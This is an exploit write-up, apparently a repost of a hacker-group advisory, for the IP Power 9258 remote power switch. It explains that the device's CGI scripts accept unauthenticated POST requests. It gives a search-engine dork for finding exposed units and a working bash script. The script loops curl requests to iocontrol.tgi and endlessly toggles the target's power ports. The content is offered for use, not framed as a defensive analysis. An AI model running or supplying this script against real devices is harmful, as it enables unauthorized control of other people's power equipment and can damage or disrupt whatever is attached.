|
| | | | | |
| | __ \ _` | | | _ \ __| _` | __| _ \ _` |
| | | | ( | | | ( | ( ( | | __/ ( |
\___/ _| _|\__,_|_|_|\___/ \___|\__,_|\__|\___|\__,_|
___|
\___ \ __ \ _` | __| _ \
| | | ( | ( __/
_____/ .__/ \__,_|\___|\___|
_|
|Teach, Learn, Party|Teach, Learn, Party|Teach, Learn, Party|
irc.efnet.net #unallocatedspace
--=+Multiple Remote Exploits in IP Power 9258+=-- by Crypt0s
IP Power is a Taiwanese company specializing in remote access devices that
let you turn on/off power ports via and ethernet connection.
They certainly are remote access!
Their IP Power 9258 line of devices run a firmware that is supposedly
"secure" but in fact just doesnt let you see the HTML output of the scripts
on the device without the appropriate login cookie.
Fortunantly, the /tgi/ (synonymous with CGI) scripts folder is full of the
CGI scripts that you need to operate the device, and they still accept post
requests.
GoogleDork: IP9258 Login Please enter
Look on all major search engines, they all have one or two.
This is made in Bash, mostly because this isn't worth scripting in Perl or
Metasploit:
#!/bin/bash
args=("$@")
while [ 1==1 ]
do
curl --data
"P60=On&P60_TS=0&P60_TC=Off&P61=Off&P61_TS=0&P61_TC=Off&P62=Off&P62_TS=0&P62_TC=Off&P63=Off&P63_TS=0&P63_TC=Off&ButtonName=Apply"
http://${args[0]}/tgi/iocontrol.tgi
curl --data
"P60=Off&P60_TS=0&P60_TC=Off&P61=On&P61_TS=0&P61_TC=Off&P62=Off&P62_TS=0&P62_TC=Off&P63=Off&P63_TS=0&P63_TC=Off&ButtonName=Apply"
http://${args[0]}/tgi/iocontrol.tgi
curl --data
"P60=Off&P60_TS=0&P60_TC=Off&P61=Off&P61_TS=0&P61_TC=Off&P62=On&P62_TS=0&P62_TC=Off&P63=Off&P63_TS=0&P63_TC=Off&ButtonName=Apply"
http://${args[0]}/tgi/iocontrol.tgi
curl --data
"P60=Off&P60_TS=0&P60_TC=Off&P61=Off&P61_TS=0&P61_TC=Off&P62=Off&P62_TS=0&P62_TC=Off&P63=On&P63_TS=0&P63_TC=Off&ButtonName=Apply"
http://${args[0]}/tgi/iocontrol.tgi
done
|
| |
|
推荐
评论(0条)
